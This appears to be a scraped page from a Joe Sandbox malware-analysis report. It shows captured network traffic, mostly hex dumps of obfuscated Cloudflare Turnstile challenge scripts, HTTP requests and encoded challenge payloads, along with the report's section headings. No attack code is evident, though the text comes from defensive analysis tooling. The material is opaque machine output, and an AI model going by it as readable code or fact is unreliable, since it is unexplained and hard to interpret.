G===H},'rrHjT':function(G,H,I,J){return G(H,I,J)},'DVWDU':jL(1170),'lFavf':function(G,H){return G+H},'ppF
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 37 33 29 2c 27 76 57 42 77 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 73 51 45 5a 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 51 72 50 45 55 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 74 4f 74 72 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 53 44 57 74 43 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 42 67 64 7a 49 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 6a 4f 28 31 32 30 37 29 5d 28 68 29 2c 6b 3d 30 3b 69 5b 6a 4f 28 35 38 35 29 5d 28 6b 2c 6a 5b Data Ascii: 73),'vWBwm':function(n,o){return n+o},'sQEZm':function(n,o){return n<o},'QrPEU':function(n,o){return n===o},'tOtrf':function(n,o){return n<o},'SDWtC':function(n,o){return o===n},'BgdzI':function(n,o){return n(o)}},j=Object[jO(1207)](h),k=0;i[jO(585)](k,j[
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 3d 63 5b 6a 52 28 31 38 38 33 29 5d 28 66 2c 6a 52 28 31 34 39 31 29 29 29 7d 2c 65 29 7d 2c 66 46 5b 69 7a 28 32 30 32 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 6a 53 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 29 7b 6a 3d 28 6a 53 3d 69 7a 2c 69 3d 7b 7d 2c 69 5b 6a 53 28 31 32 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 69 5b 6a 53 28 32 33 38 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 69 5b 6a 53 28 31 33 38 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 69 5b 6a 53 28 32 30 31 33 29 5d 3d 6a 53 28 32 31 33 31 29 2c 69 5b 6a 53 28 36 33 33 29 5d 3d 6a 53 28 31 34 35 38 29 2c 69 5b 6a Data Ascii: =c[jR(1883)](f,jR(1491)))},e)},fF[iz(2027)]=function(f,g,h,jS,i,j,k,l,m,n,o,s,x,B){j=(jS=iz,i={},i[jS(1278)]=function(C,D){return C+D},i[jS(2384)]=function(C,D){return C+D},i[jS(1385)]=function(C,D){return C+D},i[jS(2013)]=jS(2131),i[jS(633)]=jS(1458),i[j
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 6f 3d 28 6f 3d 42 2e 68 5b 31 36 36 2e 39 34 5e 43 2e 67 5d 2c 73 3d 6a 5b 6a 54 28 31 31 36 33 29 5d 28 6f 5b 33 5d 2c 44 2e 6a 29 2c 6f 5b 33 5d 3d 6a 5b 6a 54 28 38 36 30 29 5d 28 73 2c 73 29 2a 35 38 39 33 32 2b 6a 5b 6a 54 28 38 36 30 29 5d 28 34 36 36 39 33 2c 73 29 2b 35 32 32 36 36 26 32 35 35 2c 45 2e 68 5b 6a 5b 6a 54 28 32 33 37 33 29 5d 28 46 2e 6a 2c 47 2e 67 29 5d 29 3b 74 72 79 7b 6f 5b 6a 54 28 39 31 36 29 5d 28 52 29 28 53 2e 6a 29 7d 63 61 74 63 68 28 76 29 7b 69 66 28 6f 3d 61 31 2e 68 5b 61 32 2e 67 5e 32 31 2e 33 34 5d 2c 30 3c 6f 5b 6a 54 28 31 32 36 34 29 5d 29 7b 69 66 28 61 39 2e 68 5b 61 61 2e 67 5e 31 38 33 2e 37 31 5d 3d 76 2c 73 3d 6f 5b 6a 54 28 31 34 30 32 29 5d 28 29 2c 6a 5b 6a 54 28 37 35 31 29 5d 28 2d 31 2c 73 29 29 74 Data Ascii: o=(o=B.h[166.94^C.g],s=j[jT(1163)](o[3],D.j),o[3]=j[jT(860)](s,s)*58932+j[jT(860)](46693,s)+52266&255,E.h[j[jT(2373)](F.j,G.g)]);try{o[jT(916)](R)(S.j)}catch(v){if(o=a1.h[a2.g^21.34],0<o[jT(1264)]){if(a9.h[aa.g^183.71]=v,s=o[jT(1402)](),j[jT(751)](-1,s))t
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 69 7a 28 31 37 36 39 29 2c 67 78 5b 69 7a 28 31 36 39 36 29 5d 3d 69 7a 28 31 34 32 39 29 2c 67 79 3d 7b 7d 2c 67 79 5b 69 7a 28 31 39 39 37 29 5d 3d 69 7a 28 35 34 30 29 2c 67 79 5b 69 7a 28 39 30 33 29 5d 3d 69 7a 28 38 37 31 29 2c 67 79 5b 69 7a 28 31 33 36 34 29 5d 3d 69 7a 28 32 31 30 30 29 2c 67 79 5b 69 7a 28 31 35 34 34 29 5d 3d 69 7a 28 38 38 30 29 2c 67 79 5b 69 7a 28 31 34 38 35 29 5d 3d 69 7a 28 36 36 34 29 2c 67 79 5b 69 7a 28 31 38 31 32 29 5d 3d 69 7a 28 31 30 33 38 29 2c 67 79 5b 69 7a 28 32 32 33 31 29 5d 3d 69 7a 28 31 37 37 34 29 2c 67 79 5b 69 7a 28 31 34 30 35 29 5d 3d 69 7a 28 31 30 38 35 29 2c 67 79 5b 69 7a 28 31 36 31 38 29 5d 3d 69 7a 28 31 34 39 38 29 2c 67 79 5b 69 7a 28 31 34 39 31 29 5d 3d 69 7a 28 31 38 36 33 29 2c 67 79 5b Data Ascii: iz(1769),gx[iz(1696)]=iz(1429),gy={},gy[iz(1997)]=iz(540),gy[iz(903)]=iz(871),gy[iz(1364)]=iz(2100),gy[iz(1544)]=iz(880),gy[iz(1485)]=iz(664),gy[iz(1812)]=iz(1038),gy[iz(2231)]=iz(1774),gy[iz(1405)]=iz(1085),gy[iz(1618)]=iz(1498),gy[iz(1491)]=iz(1863),gy[
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 2c 67 42 5b 69 7a 28 31 31 36 38 29 5d 3d 69 7a 28 32 32 34 32 29 2c 67 42 5b 69 7a 28 37 39 32 29 5d 3d 69 7a 28 31 35 38 37 29 2c 67 42 5b 69 7a 28 38 34 32 29 5d 3d 69 7a 28 31 34 38 34 29 2c 67 42 5b 69 7a 28 31 30 33 37 29 5d 3d 69 7a 28 31 32 35 34 29 2c 67 42 5b 69 7a 28 32 30 32 32 29 5d 3d 69 7a 28 31 35 39 32 29 2c 67 42 5b 69 7a 28 31 31 31 36 29 5d 3d 69 7a 28 34 38 32 29 2c 67 42 5b 69 7a 28 31 36 39 36 29 5d 3d 69 7a 28 31 30 39 38 29 2c 67 43 3d 7b 7d 2c 67 43 5b 69 7a 28 31 39 39 37 29 5d 3d 69 7a 28 31 35 38 35 29 2c 67 43 5b 69 7a 28 39 30 33 29 5d 3d 69 7a 28 31 37 39 37 29 2c 67 43 5b 69 7a 28 31 33 36 34 29 5d 3d 69 7a 28 31 35 32 33 29 2c 67 43 5b 69 7a 28 31 35 34 34 29 5d 3d 69 7a 28 31 33 30 35 29 2c 67 43 5b 69 7a 28 31 34 38 35 Data Ascii: ,gB[iz(1168)]=iz(2242),gB[iz(792)]=iz(1587),gB[iz(842)]=iz(1484),gB[iz(1037)]=iz(1254),gB[iz(2022)]=iz(1592),gB[iz(1116)]=iz(482),gB[iz(1696)]=iz(1098),gC={},gC[iz(1997)]=iz(1585),gC[iz(903)]=iz(1797),gC[iz(1364)]=iz(1523),gC[iz(1544)]=iz(1305),gC[iz(1485
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 29 5d 3d 69 7a 28 31 35 33 31 29 2c 67 46 5b 69 7a 28 31 38 31 32 29 5d 3d 69 7a 28 39 32 36 29 2c 67 46 5b 69 7a 28 32 32 33 31 29 5d 3d 69 7a 28 31 31 30 38 29 2c 67 46 5b 69 7a 28 31 34 30 35 29 5d 3d 69 7a 28 32 31 39 37 29 2c 67 46 5b 69 7a 28 31 36 31 38 29 5d 3d 69 7a 28 32 31 36 35 29 2c 67 46 5b 69 7a 28 31 34 39 31 29 5d 3d 69 7a 28 31 33 32 39 29 2c 67 46 5b 69 7a 28 31 31 36 38 29 5d 3d 69 7a 28 36 36 35 29 2c 67 46 5b 69 7a 28 37 39 32 29 5d 3d 69 7a 28 38 35 38 29 2c 67 46 5b 69 7a 28 38 34 32 29 5d 3d 69 7a 28 32 35 34 32 29 2c 67 46 5b 69 7a 28 31 30 33 37 29 5d 3d 69 7a 28 35 34 32 29 2c 67 46 5b 69 7a 28 32 30 32 32 29 5d 3d 69 7a 28 35 38 34 29 2c 67 46 5b 69 7a 28 31 31 31 36 29 5d 3d 69 7a 28 31 32 32 38 29 2c 67 46 5b 69 7a 28 31 36 Data Ascii: )]=iz(1531),gF[iz(1812)]=iz(926),gF[iz(2231)]=iz(1108),gF[iz(1405)]=iz(2197),gF[iz(1618)]=iz(2165),gF[iz(1491)]=iz(1329),gF[iz(1168)]=iz(665),gF[iz(792)]=iz(858),gF[iz(842)]=iz(2542),gF[iz(1037)]=iz(542),gF[iz(2022)]=iz(584),gF[iz(1116)]=iz(1228),gF[iz(16
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 7a 28 31 36 39 36 29 5d 3d 69 7a 28 39 32 37 29 2c 67 4a 3d 7b 7d 2c 67 4a 5b 69 7a 28 31 39 39 37 29 5d 3d 69 7a 28 31 33 36 38 29 2c 67 4a 5b 69 7a 28 39 30 33 29 5d 3d 69 7a 28 32 32 31 32 29 2c 67 4a 5b 69 7a 28 31 33 36 34 29 5d 3d 69 7a 28 32 30 31 34 29 2c 67 4a 5b 69 7a 28 31 35 34 34 29 5d 3d 69 7a 28 32 33 39 35 29 2c 67 4a 5b 69 7a 28 31 34 38 35 29 5d 3d 69 7a 28 36 39 36 29 2c 67 4a 5b 69 7a 28 31 38 31 32 29 5d 3d 69 7a 28 32 35 34 39 29 2c 67 4a 5b 69 7a 28 32 32 33 31 29 5d 3d 69 7a 28 34 38 35 29 2c 67 4a 5b 69 7a 28 31 34 30 35 29 5d 3d 69 7a 28 31 33 35 38 29 2c 67 4a 5b 69 7a 28 31 36 31 38 29 5d 3d 69 7a 28 32 34 39 33 29 2c 67 4a 5b 69 7a 28 31 34 39 31 29 5d 3d 69 7a 28 37 34 36 29 2c 67 4a 5b 69 7a 28 31 31 36 38 29 5d 3d 69 7a 28 Data Ascii: z(1696)]=iz(927),gJ={},gJ[iz(1997)]=iz(1368),gJ[iz(903)]=iz(2212),gJ[iz(1364)]=iz(2014),gJ[iz(1544)]=iz(2395),gJ[iz(1485)]=iz(696),gJ[iz(1812)]=iz(2549),gJ[iz(2231)]=iz(485),gJ[iz(1405)]=iz(1358),gJ[iz(1618)]=iz(2493),gJ[iz(1491)]=iz(746),gJ[iz(1168)]=iz(
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 32 32 30 29 2c 67 4d 5b 69 7a 28 37 39 32 29 5d 3d 69 7a 28 36 39 31 29 2c 67 4d 5b 69 7a 28 38 34 32 29 5d 3d 69 7a 28 31 34 33 39 29 2c 67 4d 5b 69 7a 28 31 30 33 37 29 5d 3d 69 7a 28 32 34 35 38 29 2c 67 4d 5b 69 7a 28 32 30 32 32 29 5d 3d 69 7a 28 32 32 31 37 29 2c 67 4d 5b 69 7a 28 31 31 31 36 29 5d 3d 69 7a 28 31 35 36 34 29 2c 67 4d 5b 69 7a 28 31 36 39 36 29 5d 3d 69 7a 28 32 32 36 36 29 2c 67 4e 3d 7b 7d 2c 67 4e 5b 69 7a 28 31 39 39 37 29 5d 3d 69 7a 28 39 32 30 29 2c 67 4e 5b 69 7a 28 39 30 33 29 5d 3d 69 7a 28 32 31 30 36 29 2c 67 4e 5b 69 7a 28 31 33 36 34 29 5d 3d 69 7a 28 31 31 33 30 29 2c 67 4e 5b 69 7a 28 31 35 34 34 29 5d 3d 69 7a 28 31 30 35 39 29 2c 67 4e 5b 69 7a 28 31 34 38 35 29 5d 3d 69 7a 28 31 39 30 38 29 2c 67 4e 5b 69 7a 28 31 Data Ascii: 220),gM[iz(792)]=iz(691),gM[iz(842)]=iz(1439),gM[iz(1037)]=iz(2458),gM[iz(2022)]=iz(2217),gM[iz(1116)]=iz(1564),gM[iz(1696)]=iz(2266),gN={},gN[iz(1997)]=iz(920),gN[iz(903)]=iz(2106),gN[iz(1364)]=iz(1130),gN[iz(1544)]=iz(1059),gN[iz(1485)]=iz(1908),gN[iz(1

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:36 UTC	785	OUT	GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:37 UTC	240	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:37 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 89d53a7b89c343cb-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:37 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:38 UTC	916	OUT	POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 2658 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: e7db8d6cd2b6574 sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:38 UTC	2658	OUT	Data Raw: 76 5f 38 39 64 35 33 61 37 35 39 65 63 38 30 63 62 34 3d 44 6a 43 48 4f 48 6f 48 4d 48 75 48 64 48 39 68 73 42 68 73 2d 4d 47 2d 47 49 63 4a 47 63 73 47 4d 62 49 4c 43 61 73 67 62 73 65 4d 24 49 54 6a 47 79 73 51 68 39 73 51 2d 73 6b 63 37 6c 73 44 61 62 62 73 69 75 73 55 46 73 65 71 2d 47 75 24 48 63 6c 73 24 48 51 31 39 73 51 6b 35 43 73 63 52 61 73 64 45 73 52 43 61 73 50 55 6c 5a 31 54 4e 65 25 32 62 48 61 47 6e 73 24 61 65 72 63 53 4f 41 2d 73 6e 73 77 61 73 33 73 4c 61 63 30 54 51 49 37 2b 44 75 52 6e 59 61 48 43 24 62 4d 43 34 52 61 73 50 68 48 73 33 48 55 64 39 49 48 43 71 73 55 37 73 54 77 2d 49 61 78 48 49 61 55 38 57 24 48 73 62 48 47 33 4a 75 48 73 43 58 61 73 34 71 59 78 54 58 61 4d 32 35 52 66 73 51 59 7a 34 73 47 6b 24 61 73 67 2b 2d 31 4d Data Ascii: v_89d53a759ec80cb4=DjCHOHoHMHuHdH9hsBhs-MG-GIcJGcsGMbILCasgbseM$ITjGysQh9sQ-skc7lsDabbsiusUFseq-Gu$Hcls$HQ19sQk5CscRasdEsRCasPUlZ1TNe%2bHaGns$aercSOA-snswas3sLac0TQI7+DuRnYaHC$bMC4RasPhHs3HUd9IHCqsU7sTw-IaxHIaU8W$HsbHG3JuHsCXas4qYxTXaM25RfsQYz4sGk$asg+-1M
2024-07-03 07:40:38 UTC	731	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:38 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 125760 Connection: close cf-chl-gen: gQ0wHQbmnNHat6j99VWQiDmtk4w12r8tFn3sW6QLS8XoFUAUCttbWuTSd+0t5Xe9i29EriG+yg1JVoBf3rJsfHEkU2xg+OH7s6gTVOstHibz633p9suzbdHgd9WGM9O8Knf9gEuZL4IuAk79WwEHlEzkDP7NO4s2mw+B25j8cBWViybdQyBow0+l2lOe6ICwyFQikMWdFdZSeW0QciGxWzlkHYcihLdn4EbDMcbXez1NZkJPHD7Qa70DgpyAA6699WwmYbhdhgg06GBCVUA3S2vez+L+tX3b6B50i+mpj9UD3560R+ymBwMx5zXpx7wK51/XaAsR+o2+zqvAKNL/i+EBm7z4Or/MA3IxwaGQB6X04UBEFDJkaIE5af+HzU1cfldRasuwyFARfaPymTbI73PobO5WK0eP70NsUey2Yo+JQ2BSkuQpzxcoysoj1MrXly29GzMw+e1gR3MFgOsbbw==$OiS7Ctvv46O/k63Ziy2lwQ== Server: cloudflare CF-RAY: 89d53a839f63176c-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:38 UTC	638	IN	Data Raw: 78 72 66 41 67 38 75 54 69 35 2b 61 70 72 72 42 7a 63 4f 54 72 38 43 33 79 4b 71 33 71 62 4b 2b 32 74 71 53 73 4d 37 54 75 4a 2b 31 35 39 4c 58 6f 4d 43 2f 34 39 75 71 77 62 33 4a 35 4b 76 32 7a 63 50 54 38 64 62 63 36 50 57 2b 36 2b 72 54 76 67 44 2b 42 4e 34 44 41 65 44 34 35 76 62 4a 36 64 72 6c 35 65 59 56 7a 38 2f 75 45 78 49 62 2b 39 4d 55 39 65 33 70 45 50 72 78 44 79 59 6d 47 50 7a 65 47 78 2f 38 4c 52 6b 6e 41 54 45 62 4a 53 6f 75 4b 53 4c 79 49 79 77 54 42 2f 4d 77 46 77 73 72 51 78 51 50 48 68 30 68 2b 52 72 37 43 51 77 67 49 6b 63 35 48 30 4a 4c 4a 53 6c 48 4c 43 67 6a 49 30 30 33 4b 46 55 32 4d 79 6b 73 58 56 45 69 4a 52 39 69 57 31 4a 73 50 79 51 39 4f 7a 67 77 50 44 78 4e 51 46 5a 43 51 44 4e 37 53 32 56 56 64 47 2b 41 64 56 42 63 55 6e 42 Data Ascii: xrfAg8uTi5+aprrBzcOTr8C3yKq3qbK+2tqSsM7TuJ+159LXoMC/49uqwb3J5Kv2zcPT8dbc6PW+6+rTvgD+BN4DAeD45vbJ6drl5eYVz8/uExIb+9MU9e3pEPrxDyYmGPzeGx/8LRknATEbJSouKSLyIywTB/MwFwsrQxQPHh0h+Rr7CQwgIkc5H0JLJSlHLCgjI003KFU2MyksXVEiJR9iW1JsPyQ9OzgwPDxNQFZCQDN7S2VVdG+AdVBcUnB
2024-07-03 07:40:38 UTC	1369	IN	Data Raw: 78 30 65 36 53 43 6c 36 69 58 6e 32 46 69 69 58 71 4b 62 72 4b 4a 64 32 36 50 67 70 43 4e 68 62 61 57 65 72 57 4e 6d 34 79 7a 6e 4a 6d 32 75 63 4c 45 70 4d 33 41 79 63 47 2f 7a 36 33 52 72 70 4b 6b 73 4c 48 59 6d 62 47 75 72 61 65 57 6d 61 71 77 72 62 4b 68 33 72 33 6b 6f 4c 53 73 70 2b 6e 42 7a 65 76 72 33 36 75 72 39 2b 33 6c 30 72 6e 61 30 4c 76 73 2f 65 44 50 32 4e 45 41 32 50 50 33 30 37 76 6f 34 39 6a 75 43 73 76 50 2f 73 73 42 34 63 76 50 44 52 41 4b 2b 68 44 33 43 51 66 76 44 64 6a 64 34 76 7a 64 39 66 50 32 48 67 76 6a 4c 69 30 51 4c 7a 41 43 48 7a 51 6e 49 44 4c 74 4f 44 41 52 39 76 55 39 39 44 73 68 45 79 35 41 45 43 49 65 42 6a 73 39 51 7a 34 57 42 56 41 4d 4a 43 67 7a 50 41 63 78 56 53 64 53 54 69 6c 4b 53 78 77 38 4c 43 45 69 47 54 73 36 56 Data Ascii: x0e6SCl6iXn2FiiXqKbrKJd26PgpCNhbaWerWNm4yznJm2ucLEpM3AycG/z63RrpKksLHYmbGuraeWmaqwrbKh3r3koLSsp+nBzevr36ur9+3l0rna0Lvs/eDP2NEA2PP307vo49juCsvP/ssB4cvPDRAK+hD3CQfvDdjd4vzd9fP2HgvjLi0QLzACHzQnIDLtODAR9vU99DshEy5AECIeBjs9Qz4WBVAMJCgzPAcxVSdSTilKSxw8LCEiGTs6V
2024-07-03 07:40:38 UTC	1369	IN	Data Raw: 48 5a 4a 2b 52 70 5a 36 62 67 37 52 31 6b 62 47 61 70 49 32 6d 73 70 70 36 6b 4a 4c 41 65 37 4b 6b 74 35 72 45 6f 70 6d 6a 6f 4d 53 45 71 6f 6e 52 78 38 50 53 77 38 36 6c 77 64 71 55 7a 72 75 5a 6c 62 57 76 32 4e 6a 62 77 4f 54 41 31 4b 4b 78 74 38 72 71 6f 2b 58 4e 30 66 4b 2b 33 4d 62 6e 37 4e 62 45 2b 50 54 59 7a 76 33 30 75 73 71 33 33 51 54 32 78 66 6a 78 78 65 6a 34 35 2b 30 4c 37 50 44 6c 2f 66 76 7a 34 4f 58 4d 39 64 45 48 37 42 63 65 44 68 44 57 49 42 45 56 48 51 37 64 42 41 51 52 35 75 67 6c 48 66 62 2b 2b 67 44 72 48 42 7a 77 38 67 55 74 4c 50 63 6b 42 53 55 4f 39 41 41 70 4e 6a 31 44 45 54 55 58 52 78 59 54 4b 79 73 68 47 45 6b 74 48 6b 4a 4e 52 78 4e 57 4d 31 63 74 49 7a 74 56 4d 53 64 4a 55 53 35 53 58 57 4d 35 4f 43 4a 53 4e 30 63 36 52 54 Data Ascii: HZJ+RpZ6bg7R1kbGapI2mspp6kJLAe7Kkt5rEopmjoMSEqonRx8PSw86lwdqUzruZlbWv2NjbwOTA1KKxt8rqo+XN0fK+3Mbn7NbE+PTYzv30usq33QT2xfjxxej45+0L7PDl/fvz4OXM9dEH7BceDhDWIBEVHQ7dBAQR5uglHfb++gDrHBzw8gUtLPckBSUO9AApNj1DETUXRxYTKyshGEktHkJNRxNWM1ctIztVMSdJUS5SXWM5OCJSN0c6RT
2024-07-03 07:40:38 UTC	1369	IN	Data Raw: 69 4b 2b 69 69 61 61 70 67 6e 47 6f 74 36 36 56 6a 5a 57 59 65 34 43 7a 68 49 5a 2b 6b 63 43 6a 6c 37 36 72 6f 72 71 78 73 73 44 4e 78 38 72 41 74 4b 65 72 74 4a 65 2b 32 4b 7a 59 7a 74 33 64 77 64 62 59 35 38 53 2b 34 39 33 72 35 74 76 72 30 4e 37 67 38 2b 7a 4e 37 75 33 49 78 76 48 48 35 4d 76 52 74 38 7a 53 39 72 6f 41 78 4e 44 53 39 65 4b 38 2f 63 4c 75 33 51 45 4a 37 4f 4d 41 36 4d 34 52 46 77 51 5a 37 76 77 63 46 78 51 66 36 66 6e 31 34 65 77 6b 2f 75 49 45 48 69 76 34 2b 77 48 37 2b 65 73 43 4c 53 67 6c 4c 54 41 6d 4f 44 59 4e 42 50 72 39 4f 41 6f 31 49 7a 63 2b 4f 53 51 7a 51 6b 45 7a 47 54 78 46 48 79 51 2f 4d 67 78 4c 54 53 35 58 56 6b 38 35 4b 44 52 50 45 7a 68 4a 46 6c 64 59 50 32 52 62 4f 43 56 64 4a 55 42 55 57 79 5a 70 52 6c 38 6f 62 30 42 Data Ascii: iK+iiaapgnGot66VjZWYe4CzhIZ+kcCjl76rorqxssDNx8rAtKertJe+2KzYzt3dwdbY58S+493r5tvr0N7g8+zN7u3IxvHH5MvRt8zS9roAxNDS9eK8/cLu3QEJ7OMA6M4RFwQZ7vwcFxQf6fn14ewk/uIEHiv4+wH7+esCLSglLTAmODYNBPr9OAo1Izc+OSQzQkEzGTxFHyQ/MgxLTS5XVk85KDRPEzhJFldYP2RbOCVdJUBUWyZpRl8ob0B
2024-07-03 07:40:38 UTC	1369	IN	Data Raw: 33 4b 74 6a 4c 6c 78 64 35 75 32 66 70 4f 57 78 5a 61 53 77 72 61 70 71 36 71 6c 76 49 2b 48 76 4a 2b 78 78 74 47 32 73 4b 69 71 79 73 76 63 76 61 32 65 77 61 72 53 31 4b 48 63 35 73 65 67 36 39 58 47 31 64 33 48 30 4b 66 54 71 63 66 4e 34 4f 33 49 34 74 6e 46 75 39 58 4a 41 4c 62 2b 39 4e 6e 43 33 41 50 43 33 4e 63 46 77 75 72 59 33 64 77 50 32 75 48 4c 79 38 73 56 34 2f 44 34 43 68 62 59 47 76 6e 38 48 77 4c 69 2b 79 41 62 4a 69 6a 39 48 67 49 4b 2b 78 6a 6b 49 78 30 61 49 4f 6f 47 43 51 48 79 4e 69 49 44 4c 50 77 33 50 41 74 43 4c 41 78 46 52 6a 6f 41 50 53 63 41 47 77 49 57 48 44 73 77 4c 7a 4a 54 45 53 38 52 56 6b 6f 75 4a 55 55 71 4a 7a 55 36 59 54 74 56 50 55 34 7a 52 7a 6c 45 49 45 59 6a 51 46 31 47 52 7a 77 35 55 6c 51 7a 59 55 39 47 4c 33 4e 54 Data Ascii: 3KtjLlxd5u2fpOWxZaSwrapq6qlvI+HvJ+xxtG2sKiqysvcva2ewarS1KHc5seg69XG1d3H0KfTqcfN4O3I4tnFu9XJALb+9NnC3APC3NcFwurY3dwP2uHLy8sV4/D4ChbYGvn8HwLi+yAbJij9HgIK+xjkIx0aIOoGCQHyNiIDLPw3PAtCLAxFRjoAPScAGwIWHDswLzJTES8RVkouJUUqJzU6YTtVPU4zRzlEIEYjQF1GRzw5UlQzYU9GL3NT
